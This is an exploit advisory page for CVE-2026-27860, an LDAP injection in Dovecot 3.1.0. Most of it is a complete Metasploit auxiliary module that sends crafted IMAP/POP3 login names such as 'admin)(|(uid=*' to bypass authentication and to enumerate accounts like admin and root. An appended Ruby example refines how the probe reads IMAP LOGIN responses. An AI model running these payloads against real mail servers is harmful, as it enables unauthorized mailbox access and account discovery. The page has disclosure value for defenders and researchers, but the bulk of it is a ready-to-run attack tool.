Dovecot 3.1.0 Authentication Bypass / User Enumeration

Published: 22 Apr 2026 00:00:00
Reported by: indoushka
Type: packetstorm
Source: packetstorm.news

Dovecot 3.1.0 LDAP injection vulnerability allows authentication bypass or user enumeration.

Related

Family          Reporter      Title                                                              Published
ATTACKERKB      attackerkb    CVE-2026-27860                                                     27 Mar 2026 08:10
AlpineLinux     alpinelinux   CVE-2026-27860                                                     27 Mar 2026 08:10
Circl           circl         CVE-2026-27860                                                     27 Mar 2026 12:32
CNNVD           cnnvd         Open-Xchange OX Dovecot Pro security vulnerability                 27 Mar 2026 00:00
CVE             cve           CVE-2026-27860                                                     27 Mar 2026 08:10
Cvelist         cvelist       CVE-2026-27860                                                     27 Mar 2026 08:10
Debian          debian        [SECURITY] [DSA 6197-1] dovecot security update                    5 Apr 2026 15:22
Debian CVE      debiancve     CVE-2026-27860                                                     27 Mar 2026 08:10
Tenable Nessus  nessus        Debian dsa-6197 : dovecot-auth-lua - security update               5 Apr 2026 00:00
Tenable Nessus  nessus        openSUSE 16 Security Update : dovecot24 (openSUSE-SU-2026:20554-1) 22 Apr 2026 00:00
==================================================================================================================================
    | # Title     : Dovecot 3.1.0 LDAP Injection Authentication Bypass                                                               |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.dovecotpro.com/                                                                                      |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit auxiliary module targets an LDAP injection vulnerability in Dovecot mail servers that can lead to authentication bypass or user enumeration via IMAP/POP3. The login name the client supplies ends up inside the LDAP filter the server uses to look the account up; if it is not escaped, it can change the structure of that filter.
    
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Auxiliary::Report
      include Msf::Exploit::Remote::Tcp
      include Msf::Auxiliary::Scanner
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Dovecot LDAP Injection Authentication Bypass',
            'Description' => %q{
              Probes Dovecot IMAP/POP3 logins for the LDAP filter injection
              tracked as CVE-2026-27860, which can lead to authentication
              bypass or user enumeration.
            },
            'Author' => [
              'indoushka'
            ],
            'References' => [
              ['CVE', '2026-27860']
            ],
            'License' => MSF_LICENSE,
            'DisclosureDate' => '2026-03-27'
          )
        )
    
        register_options([
          Opt::RPORT(143), # IMAP default; set RPORT to 110 when PROTOCOL is POP3
          OptString.new('USERNAME', [false, 'Username to test; leave empty to try a list of common names', '']),
          OptString.new('LDAP_FILTER', [false, 'Filter fragment injected after the closed uid term (default: *)(uid=*)', '']),
          OptEnum.new('PROTOCOL', [true, 'Protocol', 'IMAP', ['IMAP', 'POP3']])
        ])
      end
    
      def run_host(ip)
        print_status("Dovecot LDAP Injection CVE-2026-27860")
        print_status("Target: #{ip}:#{rport}")
    
        if datastore['USERNAME'].to_s.strip.empty?
          enumerate_users
        else
          test_ldap_injection
        end
      end
    
      def enumerate_users
        print_status("Enumerating users...")
    
        common_users = ['admin', 'root', 'postmaster', 'webmaster', 'test', 'user']
    
        common_users.each do |user|
          payload = "#{user})(|(uid=*"
          vprint_status("Testing: #{user}")
    
          if test_auth(payload)
            print_good("User found: #{user}")
            report_user(user)
          end
    
          sleep(0.5)
        end
      end
    
      def test_ldap_injection
        ldap_payload = datastore['LDAP_FILTER'].to_s.empty? ? "*)(uid=*" : datastore['LDAP_FILTER']
    
        username = datastore['USERNAME']
        test_username = "#{username})(#{ldap_payload}"
    
        print_status("Testing injection: #{test_username}")
    
        if test_auth(test_username)
          print_good("LDAP injection possible for: #{username}")
          report_ldap_vulnerability
        else
          print_error("No LDAP injection detected")
        end
      end
    
      # Returns true only when the server accepts the login for the supplied
      # (possibly injected) username: a tagged OK on IMAP, or +OK after PASS on
      # POP3. A tagged NO is the ordinary failure for a wrong password and is
      # not a finding, so it must not count as one.
      def test_auth(username)
        sock = nil

        begin
          sock = connect
          banner = sock.get_once
          vprint_status("Banner: #{banner}")

          if datastore['PROTOCOL'] == 'IMAP'
            # LOGIN arguments are IMAP quoted strings: only '"' and '\' need
            # escaping, so the LDAP metacharacters in the payload pass through.
            quoted = username.gsub(/["\\]/) { |c| "\\#{c}" }
            sock.put("a1 LOGIN \"#{quoted}\" \"test\"\r\n")
            response = sock.get_once
            vprint_status("Response: #{response}")

            # Match the tagged completion for our own tag. The greeting ("* OK
            # ...") and an untagged "* BYE" also contain OK/NO text and would
            # otherwise produce false positives on every probe.
            return true if response && response =~ /^a1 OK\b/i
          else
            sock.put("USER #{username}\r\n")
            response = sock.get_once

            if response && response.start_with?('+OK')
              sock.put("PASS test\r\n")
              final = sock.get_once
              return true if final && final.start_with?('+OK')
            end
          end
        rescue => e
          vprint_error("Error: #{e.message}")
        ensure
          disconnect(sock) if sock
        end

        false
      end
    
      def report_user(username)
        report_note(
          host: rhost,
          port: rport,
          type: 'dovecot.ldap.user',
          data: { username: username }
        )
      end
    
      def report_ldap_vulnerability
        report_note(
          host: rhost,
          port: rport,
          type: 'dovecot.ldap.injection',
          data: {
            vulnerable: true,
            # record the default fragment when LDAP_FILTER was left unset
            payload: datastore['LDAP_FILTER'].to_s.empty? ? '*)(uid=*' : datastore['LDAP_FILTER']
          }
        )
      end
    end
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
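The module's test_auth decides from whatever the first read returns. The following is an added example, not part of the advisory or of the module, showing the IMAP side of such a probe handled by tag: a quoted-string builder for LOGIN, a reader that finds the tagged completion for our own tag and ignores the greeting, other untagged data and `* BYE`, and the verdict a scanner should record for each outcome. The server lines are constructed to follow the IMAP response grammar (the greeting is written in Dovecot's style); none of them is a capture from a real host, and the function names are this example's own.

```ruby
# Added example (not from the advisory or the module): read an IMAP LOGIN
# outcome by its tag instead of substring-matching "OK" or "NO".

# Build a LOGIN command with IMAP quoted-string escaping so LDAP metacharacters
# reach the server unchanged while '"' and '\' do not break the command.
def imap_quote(value)
  raise ArgumentError, 'CR, LF and NUL cannot appear in an IMAP quoted string' if value =~ /[\r\n\0]/
  '"' + value.gsub(/["\\]/) { |c| "\\#{c}" } + '"'
end

def login_command(tag, user, password)
  "#{tag} LOGIN #{imap_quote(user)} #{imap_quote(password)}\r\n"
end

# Classify everything received after sending the command:
#   :ok / :no / :bad  - the tagged completion for our tag
#   :bye              - the server is closing the connection
#   :incomplete       - no tagged response for our tag yet; read more first
def imap_login_result(tag, raw)
  raw.each_line do |line|
    line = line.chomp
    return [:bye, line] if line.start_with?('* BYE')
    next if line.start_with?('* ', '+ ')          # untagged data or continuation
    t, status, rest = line.split(' ', 3)
    next unless t == tag
    case status.to_s.upcase
    when 'OK'  then return [:ok, rest.to_s]
    when 'NO'  then return [:no, rest.to_s]
    when 'BAD' then return [:bad, rest.to_s]
    end
  end
  [:incomplete, nil]
end

# What a probe should record for each outcome. Only an accepted login with a
# deliberately wrong password is evidence that the injected username changed
# the backend lookup; a NO is the ordinary failure for any bad credential.
def probe_verdict(tag, raw)
  case imap_login_result(tag, raw).first
  when :ok  then :login_accepted_with_wrong_password
  when :no  then :rejected
  when :bad then :command_malformed
  when :bye then :server_closed_connection
  else           :need_more_data
  end
end

# Constructed server-side data, as it might arrive in a single read.
GREETING = "* OK [CAPABILITY IMAP4rev1 SASL-IR AUTH=PLAIN] Dovecot ready.\r\n"
REJECTED = GREETING + "a1 NO [AUTHENTICATIONFAILED] Authentication failed.\r\n"
ACCEPTED = "a1 OK [CAPABILITY IMAP4rev1] Logged in\r\n"
CLOSED   = "* BYE Too many invalid IMAP commands.\r\n"

if __FILE__ == $PROGRAM_NAME
  print login_command('a1', 'admin)(|(uid=*', 'test')
  # The greeting carries the text "OK", yet the tagged line says NO:
  p probe_verdict('a1', REJECTED)   # :rejected
  p probe_verdict('a1', ACCEPTED)   # :login_accepted_with_wrong_password
  p probe_verdict('a1', CLOSED)     # :server_closed_connection
end
```

The :incomplete case matters in practice: a single read may return only the greeting, or only part of a multi-line response, so the caller should keep reading until the tagged line for its own tag arrives before it records anything.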


Last updated: 22 Apr 2026 00:00
Vulners AI Score: 5.8 (Medium risk)
CVSS 3.1: 3.7 - 5.3
EPSS: 0.00039